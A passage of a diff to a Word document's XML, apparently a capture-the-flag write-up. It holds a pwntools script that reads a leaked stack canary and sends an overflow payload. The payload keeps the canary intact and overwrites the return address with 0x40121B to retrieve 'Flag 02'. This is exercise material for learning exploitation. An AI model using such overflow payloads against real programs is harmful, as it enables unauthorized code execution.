+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> io.recvline()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">prompt </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"Here's a hint: "</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">canary </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> r[r.startswith(prompt) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(prompt):]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io.recvline()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io.send(cyclic(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>24</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>int</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(canary, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cyclic(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>8</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>40121B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">)) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io.shutdown()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">recieved </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> io.recvall().decode()</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">flag </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> recieved.splitlines()[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>f</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">'Flag 02: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>flag</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:eastAsia="Times New Roman" w:hAnsi="Bahnschrift" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:kern w:val="0"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5685BD68" wp14:editId="36AEA77B">
+            <wp:extent cx="5972810" cy="1275715"/>
+            <wp:effectExtent l="0" t="0" r="8890" b="635"/>
+            <wp:docPr id="528532923" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="528532923" name="Picture 1" descr="A screen shot of a computer code&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
